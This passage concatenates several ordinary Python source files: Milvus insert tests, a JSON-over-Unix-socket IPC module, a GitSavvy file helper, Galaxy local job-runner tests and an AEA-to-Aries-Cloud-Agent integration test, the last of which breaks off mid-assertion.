assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test search collection_2 after insert entity to collection_1
method: insert entity and search collection
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 for a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release)
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting entities with invalid collection names, partition names, fields and ids
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert using customize ids which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting binary entities with invalid collection names, fields and ids
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert using customize ids which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
json_ipc.py
|
import os
import socket
import threading
import logging
import easilyb.json_serialize as json
logger = logging.getLogger(__name__)
BUFFER_SIZE = 4096
MAX_OBJECT_SIZE = 1024 * 1024 * 1024 # 1GB
DEFAULT_MAX_TRIES = 5
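# Framing protocol used by JsonSocket over a stream socket (as implemented by the
# send/receive state machines below):
#   small payloads:  '1' + <json> + '\'   one frame, acknowledged with 'k' (ok) or 'r' (resend)
#   large payloads:  's' + <size> + '\'   announces a fragmented transfer
#                    'c' + <chunk> + '\'  one fragment of the serialized object
#                    'F\'                 end of fragments; whole object acknowledged with 'K' or 'R'
# Every frame sent through _send() waits for the peer's 'k'/'r' ack, and a transfer is
# retried up to max_tries times before an IOError is raised.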
class JsonSocket(object):
def __init__(self, sock, max_tries=DEFAULT_MAX_TRIES):
self.sock = sock
self.max_tries = max_tries
def _send(self, data):
tries = 0
while tries < self.max_tries:
# Print('sending... ', end='')
self.sock.sendall(data.encode())
# Print('sent: ', data)
# Print('receiving... ', end='')
ret = self.sock.recv(1).decode()
# Print('received : ' + ret)
if ret == 'k':
return
elif ret == 'r':
pass
else:
raise IOError('Expected k or r from peer')
tries += 1
def _send_fragmented(self, obj_ser, size):
tries = 0
fragement_size = BUFFER_SIZE - 2
while tries < self.max_tries:
self._send('s' + str(size) + '\\') # send size s555\
# print 's' + str(size) + '\\'
i = 0
while i < size:
self._send('c' + obj_ser[i:i + fragement_size] + '\\')
# print 'c' + str(len(obj_ser[i:i + fragement_size])) + '\\'
i += fragement_size
# Print('sending... ', end='')
self.sock.sendall(b'F\\')
# Print('sent F\\')
# print 'F\\'
# Print('receiving... ', end='')
ret = self.sock.recv(1).decode()
# Print('received : ' + ret)
if ret == 'K':
return
elif ret == 'R':
pass
else:
raise IOError('Expected K or R from peer')
tries += 1
def send(self, obj):
# logger.debug("sending obj: %s", obj)
obj_ser = json.dumps(obj)
size = len(obj_ser)
tries = 0
if size > MAX_OBJECT_SIZE:
raise ValueError("Can't send all this data!")
try:
if size < BUFFER_SIZE - 2:
self._send('1' + obj_ser + '\\')
else:
self._send_fragmented(obj_ser, size)
except Exception:
# if tries > self.max_tries or not self.reconnect():
if tries > self.max_tries: #or not self.reconnect():
raise
else:
tries += 1
def receive(self):
state = 0
data = ''
size = 0
obj_ser = ''
obj = None
state2_tries = 0
state8_tries = 0
state12_tries = 0
while True:
if state == 0:
# Print('receiving... ', end='')
data = self.sock.recv(BUFFER_SIZE).decode()
# Print('received : ' + data)
if data.endswith('\\'):
state = 1
else:
state = 2
elif state == 1:
if data.startswith('1'):
state = 3
elif data.startswith('s'):
state = 4
else:
state = 2
elif state == 2:
if state2_tries < self.max_tries:
state2_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'r')
# Print('sent k')
state = 0
else:
raise IOError("Data malformated!")
elif state == 3:
obj_ser = data[1:-1]
try:
obj = json.loads(obj_ser)
state = 5
except:
state = 2
elif state == 4:
size = int(data[1:-1])
obj_ser = ''
# print 'received: s%d//' % (size)
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
state = 6
elif state == 5:
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
# logger.debug('received obj: %s', obj)
return obj
elif state == 6:
# Print('receiving... ', end='')
data = self.sock.recv(BUFFER_SIZE).decode()
# Print('received : ' + data)
if data.endswith('\\'):
state = 7
else:
state = 8
elif state == 7:
if data.startswith('c'):
# print 'received: c + %d'%(len(data)-2)
state = 9
elif data.startswith('F'):
# print 'received: F'
state = 10
else:
state = 8
elif state == 8:
if state8_tries < self.max_tries:
state8_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'r')
# Print('sent r')
state = 6
else:
raise IOError("Data malformated!")
elif state == 9:
obj_ser += data[1:-1]
# Print('sending... ', end='')
self.sock.sendall(b'k')
# Print('sent k')
state = 6
elif state == 10:
if size == len(obj_ser):
try:
obj = json.loads(obj_ser)
state = 11
except:
state = 12
else:
state = 12
elif state == 11:
# Print('sending... ', end='')
self.sock.sendall(b'K')
# Print('sent K')
# logger.debug('received obj: %s', obj)
return obj
elif state == 12:
if state12_tries < self.max_tries:
state12_tries += 1
# Print('sending... ', end='')
self.sock.sendall(b'R')
# Print('sent R')
state = 0
else:
raise IOError("Data malformated!")
def reconnect(self):
# logger.debug("reconnecting...")
return False
def close(self):
try:
self.sock.close()
except:
pass
finally:
self.sock = None
class JsonServerSocket(JsonSocket):
def __init__(self, server_address, callback):
self.server_address = server_address
self.callback = callback
super(JsonServerSocket, self).__init__(None) # does not work
# super(JsonServerSocket, self).__init__(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) # does not work
# super call:
# self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# self.max_tries = DEFAULT_MAX_TRIES
# end super call
def bind(self):
try:
os.unlink(self.server_address)
except OSError:
if os.path.exists(self.server_address):
raise
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.bind(self.server_address)
logger.info("binded to %s" % self.server_address)
self.sock.listen(1)
def accept(self):
connection, client_address = self.sock.accept()
logger.info("accepted connection from: %s", client_address)
return JsonConnection(connection, self.callback), client_address
def reconnect(self):
logger.debug("reconnecting...")
try:
self.close()
except:
pass
try:
self.bind()
return True
except:
return False
def close(self):
try:
os.unlink(self.server_address)
except:
pass
super(JsonServerSocket, self).close()
class JsonConnection(JsonSocket):
def __init__(self, connection, callback):
self.callback = callback
super(JsonConnection, self).__init__(connection) # does not work
def receive_call(self):
request = self.receive()
logger.debug("received request: %s", request)
if 'quit' in request:
self.close()
return False
function, args, kwargs = request['func'], request['args'], request['kwargs']
try:
ret = self.callback(function, args, kwargs)
response = {'return': ret}
logger.debug("sending response: %s", response)
self.send(response)
return True
except Exception as e:
response = {'exception': {"name": str(e.__class__), "msg": str(e)}}
logger.debug("sending response: %s", response)
self.send(response)
return True
class JsonClientSocket(JsonSocket):
def __init__(self, server_address):
self.server_address = server_address
super(JsonClientSocket, self).__init__(None) # # does not work
# super(JsonClientSocket, self).__init__(socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)) # # does not work
# self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def connect(self):
# logger.debug("connecting to: %s", self.server_address)
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.server_address)
logger.debug("connected to: %s", self.server_address)
def call_function(self, function, args=None, kwargs=None):
request = {'func': function, 'args': args or list(), 'kwargs':kwargs or dict()}
self.send(request)
response = self.receive()
logger.debug("received response: %s", response)
# TODO: receive logs
if 'exception' in response:
_raise_exception(response['exception'])
if 'return' in response:
return response['return']
def quit(self):
request = {'quit': ''}
self.send(request)
self.close()
def reconnect(self):
logger.debug("reconnecting...")
try:
self.quit()
except:
pass
try:
self.connect()
return True
except:
return False
class JsonServerMaster(threading.Thread):
def __init__(self, server_address, threaded=False):
self.server_address = server_address
self.threaded = threaded
self.server = JsonServerSocket(server_address, self.callback)
self.up = True
self.ipc_functions = dict()
super().__init__()
def ipc_function(self, f):
self.ipc_functions[f.__name__] = f
return f
def callback(self, func, args, kwargs):
try:
func_call = self.ipc_functions[func]
return func_call(*args, **kwargs)
except:
logger.error("Error calling function", exc_info=True)
raise
def run(self):
self.server.bind()
try:
while self.up:
try:
connection, client_address = self.server.accept()
if self.up:
self._process_connection(connection, client_address)
else:
connection.close()
except KeyboardInterrupt:
raise
except Exception as e:
logger.error("Error in control server: %s", e, exc_info=True)
finally:
try:
self.server.close()
except:
pass
def _process_connection(self, connection, client_address):
if self.threaded:
t = threading.Thread(target=self._process_connection_run, args=(connection, client_address))
t.daemon = True
t.start()
else:
self._process_connection_run(connection, client_address)
def _process_connection_run(self, connection, client_address):
try:
while connection.receive_call():
pass
except KeyboardInterrupt:
self.stop()
except:
logger.error("Error in connection", exc_info=True)
finally:
try:
connection.close()
except:
pass
def stop(self):
if self.up:
self.up = False
# os.kill(os.getpid(), signal.SIGINT)
try:
client = JsonClientSocket(self.server_address)
client.connect()
# client.quit()
except:
pass
class JsonServerProxy:
def __init__(self, server_address):
self.client = JsonClientSocket(server_address)
self.client.connect()
def __getattribute__(self, item):
try:
return super().__getattribute__(item)
except:
return self.get_func(item)
def get_func(self, func):
def _call_func(*args, **kwargs):
return self.client.call_function(func, args, kwargs)
return _call_func
def quit(self):
self.client.quit()
def _raise_exception(exception_object):
exception_name, exception_msg = exception_object['name'], exception_object['msg']
if exception_name == 'ValueError':
raise ValueError(exception_msg)
elif exception_name == 'KeyError':
raise KeyError(exception_msg)
else:
raise Exception(exception_name + ": " + exception_msg)
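# Usage sketch (illustrative only; the socket path and the registered function are hypothetical):
#   master = JsonServerMaster('/tmp/easilyb-ipc.sock', threaded=True)
#   @master.ipc_function
#   def echo(text):
#       return text
#   master.start()                                    # serve requests in a background thread
#   proxy = JsonServerProxy('/tmp/easilyb-ipc.sock')  # any unknown attribute becomes a remote call
#   assert proxy.echo('hello') == 'hello'
#   proxy.quit()
#   master.stop()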
|
file.py
|
import sublime
import threading
import yaml
import os
from contextlib import contextmanager
if 'syntax_file_map' not in globals():
syntax_file_map = {}
if 'determine_syntax_thread' not in globals():
determine_syntax_thread = None
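# syntax_file_map is built lazily on a background thread: determine_syntax_files() scans
# every *.sublime-syntax resource once and maps each declared file extension to the list
# of syntax files that claim it. Until that scan finishes, get_syntax_for_file() falls
# back to plain text.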
def determine_syntax_files():
global determine_syntax_thread
if not syntax_file_map:
determine_syntax_thread = threading.Thread(
target=_determine_syntax_files)
determine_syntax_thread.start()
def _determine_syntax_files():
syntax_files = sublime.find_resources("*.sublime-syntax")
for syntax_file in syntax_files:
try:
# Use `sublime.load_resource`, in case Package is `*.sublime-package`.
resource = sublime.load_resource(syntax_file)
for extension in yaml.safe_load(resource)["file_extensions"]:
if extension not in syntax_file_map:
syntax_file_map[extension] = []
extension_list = syntax_file_map[extension]
extension_list.append(syntax_file)
except Exception:
continue
def get_syntax_for_file(filename):
if not determine_syntax_thread or determine_syntax_thread.is_alive():
return "Packages/Text/Plain text.tmLanguage"
extension = get_file_extension(filename)
syntaxes = syntax_file_map.get(filename, None) or syntax_file_map.get(extension, None)
return syntaxes[-1] if syntaxes else "Packages/Text/Plain text.tmLanguage"
def get_file_extension(filename):
period_delimited_segments = filename.split(".")
return "" if len(period_delimited_segments) < 2 else period_delimited_segments[-1]
def get_file_contents_binary(repo_path, file_path):
"""
Given an absolute file path, return the binary contents of that file
as a string.
"""
file_path = os.path.join(repo_path, file_path)
with safe_open(file_path, "rb") as f:
binary = f.read()
binary = binary.replace(b"\r\n", b"\n")
binary = binary.replace(b"\r", b"")
return binary
def get_file_contents(repo_path, file_path):
"""
Given an absolute file path, return the text contents of that file
as a string.
"""
binary = get_file_contents_binary(repo_path, file_path)
try:
return binary.decode('utf-8')
except UnicodeDecodeError:
return binary.decode('latin-1')
@contextmanager
def safe_open(filename, mode, *args, **kwargs):
try:
with open(filename, mode, *args, **kwargs) as file:
yield file
except PermissionError as e:
sublime.ok_cancel_dialog("GitSavvy could not access file: \n{}".format(e))
raise e
except OSError as e:
sublime.ok_cancel_dialog("GitSavvy encountered an OS error: \n{}".format(e))
raise e
|
test_runner_local.py
|
import os
import threading
import time
from typing import Optional
from unittest import TestCase
import psutil
from galaxy import (
job_metrics,
model,
)
from galaxy.app_unittest_utils.tools_support import UsesTools
from galaxy.jobs.runners import local
from galaxy.util import bunch
class TestLocalJobRunner(TestCase, UsesTools):
def setUp(self):
self.setup_app()
self._init_tool()
self.app.job_metrics = job_metrics.JobMetrics()
self.job_wrapper = MockJobWrapper(self.app, self.test_directory, self.tool)
def tearDown(self):
self.tear_down_app()
def test_run(self):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path(self):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 0
def test_default_slots(self):
self.job_wrapper.command_line = """echo $GALAXY_SLOTS"""
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override(self):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params["local_slots"] = 3
self.job_wrapper.command_line = """echo $GALAXY_SLOTS"""
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code(self):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set(self):
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_metadata_gets_set_if_embedded(self):
self.job_wrapper.job_destination.params["embed_metadata_in_job"] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job still works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_stopping_job(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
external_id = self.job_wrapper.wait_for_external_id()
assert psutil.pid_exists(external_id)
runner.stop_job(self.job_wrapper)
t.join(1)
assert not psutil.pid_exists(external_id)
def test_shutdown_no_jobs(self):
self.app.config.monitor_thread_join_timeout = 5
runner = local.LocalJobRunner(self.app, 1)
runner.start()
runner.shutdown()
def test_stopping_job_at_shutdown(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
runner.start()
self.app.config.monitor_thread_join_timeout = 15
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
external_id = self.job_wrapper.wait_for_external_id()
assert psutil.pid_exists(external_id)
runner.shutdown()
t.join(1)
assert not psutil.pid_exists(external_id)
assert "job terminated by Galaxy shutdown" in self.job_wrapper.fail_message
class MockJobWrapper:
def __init__(self, app, test_directory, tool):
working_directory = os.path.join(test_directory, "workdir")
tool_working_directory = os.path.join(working_directory, "working")
os.makedirs(tool_working_directory)
self.app = app
self.tool = tool
self.requires_containerization = False
self.state = model.Job.states.QUEUED
self.command_line = "echo HelloWorld"
self.environment_variables = []
self.commands_in_new_shell = False
self.prepare_called = False
self.dependency_shell_commands = None
self.working_directory = working_directory
self.tool_working_directory = tool_working_directory
self.requires_setting_metadata = True
self.job_destination = bunch.Bunch(id="default", params={})
self.galaxy_lib_dir = os.path.abspath("lib")
self.job = model.Job()
self.job_id = 1
self.job.id = 1
self.output_paths = ["/tmp/output1.dat"]
self.mock_metadata_path = os.path.abspath(os.path.join(test_directory, "METADATA_SET"))
self.metadata_command = "touch %s" % self.mock_metadata_path
self.galaxy_virtual_env = None
self.shell = "/bin/bash"
self.cleanup_job = "never"
self.tmp_dir_creation_statement = ""
self.use_metadata_binary = False
self.guest_ports = []
# Cruft for setting metadata externally, axe at some point.
self.external_output_metadata: Optional[bunch.Bunch] = bunch.Bunch(
set_job_runner_external_pid=lambda pid, session: None
)
self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(build_dependency_shell_commands=lambda: [])
def check_tool_output(*args, **kwds):
return "ok"
def wait_for_external_id(self):
"""Test method for waiting until an external id has been registered."""
external_id = None
for _ in range(50):
external_id = self.job.job_runner_external_id
if external_id:
break
time.sleep(0.1)
return external_id
def prepare(self):
self.prepare_called = True
def set_external_id(self, external_id, **kwd):
self.job.job_runner_external_id = external_id
def get_command_line(self):
return self.command_line
def container_monitor_command(self, *args, **kwds):
return None
def get_id_tag(self):
return "1"
def get_state(self):
return self.state
def change_state(self, state, job=None):
self.state = state
@property
def job_io(self):
return bunch.Bunch(
get_output_fnames=lambda: [],
check_job_script_integrity=False,
check_job_script_integrity_count=0,
check_job_script_integrity_sleep=0,
)
def get_job(self):
return self.job
def setup_external_metadata(self, **kwds):
return self.metadata_command
def get_env_setup_clause(self):
return ""
def has_limits(self):
return False
def fail(self, message, exception):
self.fail_message = message
self.fail_exception = exception
def finish(self, stdout, stderr, exit_code, **kwds):
self.stdout = stdout
self.stderr = stderr
self.exit_code = exit_code
def tmp_directory(self):
return None
def home_directory(self):
return None
def reclaim_ownership(self):
pass
@property
def is_cwl_job(self):
return False
|
test_http_client_connection_to_aries_cloud_agent.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""End-to-end test for AEA connecting using HTTP Client connection, to an Aries Cloud Agent."""
import asyncio
import logging
import os
import shutil
import subprocess # nosec
import time
from threading import Thread
from typing import Optional
import pytest
import yaml
from aea import AEA_DIR
from aea.aea import AEA
from aea.configurations.base import (
ConnectionConfig,
ProtocolConfig,
ProtocolId,
SkillConfig,
)
from aea.configurations.constants import DEFAULT_LEDGER, DEFAULT_PRIVATE_KEY_FILE
from aea.crypto.wallet import Wallet
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Message, Protocol
from aea.registries.resources import Resources
from aea.skills.base import Handler, Skill, SkillContext
from packages.fetchai.connections.http_client.connection import HTTPClientConnection
from packages.fetchai.protocols.http.message import HttpMessage
from tests.conftest import HTTP_PROTOCOL_PUBLIC_ID
logger = logging.getLogger(__name__)
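# Test flow: setup_class spawns a local Aries Cloud Agent ("aca-py start ...") as a
# subprocess with its admin API on 127.0.0.1:8020. test_connecting_to_aca drives it with
# a bare HTTPClientConnection sending GET /status; test_end_to_end_aea_aca goes through a
# full AEA with a minimal skill whose handler records the HTTP response.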
@pytest.mark.asyncio
class TestAEAToACA:
"""End-to-end test for an AEA connecting to an ACA via the http client connection."""
@classmethod
def setup_class(cls):
"""Initialise the class."""
cls.aca_admin_address = "127.0.0.1"
cls.aca_admin_port = 8020
cls.aea_address = "some string"
cls.aea_identity = Identity("", address=cls.aea_address)
cls.cwd = os.getcwd()
# check Aries Cloud Agents (ACA) is installed
res = shutil.which("aca-py")
if res is None:
pytest.skip(
"Please install Aries Cloud Agents first! See the following link: https://github.com/hyperledger/aries-cloudagent-python"
)
# run an ACA
# command: aca-py start --admin 127.0.0.1 8020 --admin-insecure-mode --inbound-transport http 0.0.0.0 8000 --outbound-transport http
cls.process = subprocess.Popen( # nosec
[
"aca-py",
"start",
"--admin",
cls.aca_admin_address,
str(cls.aca_admin_port),
"--admin-insecure-mode",
"--inbound-transport",
"http",
"0.0.0.0",
"8000",
"--outbound-transport",
"http",
]
)
time.sleep(4.0)
@pytest.mark.asyncio
async def test_connecting_to_aca(self):
configuration = ConnectionConfig(
host=self.aca_admin_address,
port=self.aca_admin_port,
connection_id=HTTPClientConnection.connection_id,
)
http_client_connection = HTTPClientConnection(
configuration=configuration, identity=self.aea_identity
)
http_client_connection.loop = asyncio.get_event_loop()
# Request messages
request_http_message = HttpMessage(
dialogue_reference=("1", ""),
target=0,
message_id=1,
performative=HttpMessage.Performative.REQUEST,
method="GET",
url="http://{}:{}/status".format(
self.aca_admin_address, self.aca_admin_port
),
headers="",
version="",
bodyy=b"",
)
request_http_message.counterparty = "ACA"
request_envelope = Envelope(
to="ACA",
sender="AEA",
protocol_id=HTTP_PROTOCOL_PUBLIC_ID,
message=request_http_message,
)
try:
# connect to ACA
await http_client_connection.connect()
assert http_client_connection.is_connected is True
# send request to ACA
await http_client_connection.send(envelope=request_envelope)
# receive response from ACA
response_envelop = await http_client_connection.receive()
# check the response
assert response_envelop.to == self.aea_address
assert response_envelop.sender == "HTTP Server"
assert response_envelop.protocol_id == HTTP_PROTOCOL_PUBLIC_ID
decoded_response_message = response_envelop.message
assert (
decoded_response_message.performative
== HttpMessage.Performative.RESPONSE
)
assert decoded_response_message.version == ""
assert decoded_response_message.status_code == 200
assert decoded_response_message.status_text == "OK"
assert decoded_response_message.headers is not None
assert decoded_response_message.version is not None
finally:
# disconnect from ACA
await http_client_connection.disconnect()
assert http_client_connection.is_connected is False
@pytest.mark.asyncio
async def test_end_to_end_aea_aca(self):
# AEA components
wallet = Wallet({DEFAULT_LEDGER: DEFAULT_PRIVATE_KEY_FILE})
identity = Identity(
name="my_aea_1",
address=wallet.addresses.get(DEFAULT_LEDGER),
default_address_key=DEFAULT_LEDGER,
)
configuration = ConnectionConfig(
host=self.aca_admin_address,
port=self.aca_admin_port,
connection_id=HTTPClientConnection.connection_id,
)
http_client_connection = HTTPClientConnection(
configuration=configuration, identity=identity,
)
resources = Resources()
resources.add_connection(http_client_connection)
# create AEA
aea = AEA(identity, wallet, resources)
# Add http protocol to AEA resources
http_protocol_configuration = ProtocolConfig.from_json(
yaml.safe_load(
open(
os.path.join(
self.cwd,
"packages",
"fetchai",
"protocols",
"http",
"protocol.yaml",
)
)
)
)
http_protocol = Protocol(http_protocol_configuration, HttpMessage.serializer())
resources.add_protocol(http_protocol)
# Request message & envelope
request_http_message = HttpMessage(
dialogue_reference=("", ""),
target=0,
message_id=1,
performative=HttpMessage.Performative.REQUEST,
method="GET",
url="http://{}:{}/status".format(
self.aca_admin_address, self.aca_admin_port
),
headers="",
version="",
bodyy=b"",
)
request_http_message.counterparty = "ACA"
request_envelope = Envelope(
to="ACA",
sender="AEA",
protocol_id=HTTP_PROTOCOL_PUBLIC_ID,
message=request_http_message,
)
# add a simple skill with handler
skill_context = SkillContext(aea.context)
skill_config = SkillConfig(
name="simple_skill", author="fetchai", version="0.1.0"
)
aea_handler = AEAHandler(skill_context=skill_context, name="aea_handler")
simple_skill = Skill(
skill_config, skill_context, handlers={aea_handler.name: aea_handler}
)
resources.add_skill(simple_skill)
# add error skill to AEA
error_skill = Skill.from_dir(
os.path.join(AEA_DIR, "skills", "error"), agent_context=aea.context
)
resources.add_skill(error_skill)
# start AEA thread
t_aea = Thread(target=aea.start)
try:
t_aea.start()
time.sleep(1.0)
aea.outbox.put(request_envelope)
time.sleep(5.0)
assert (
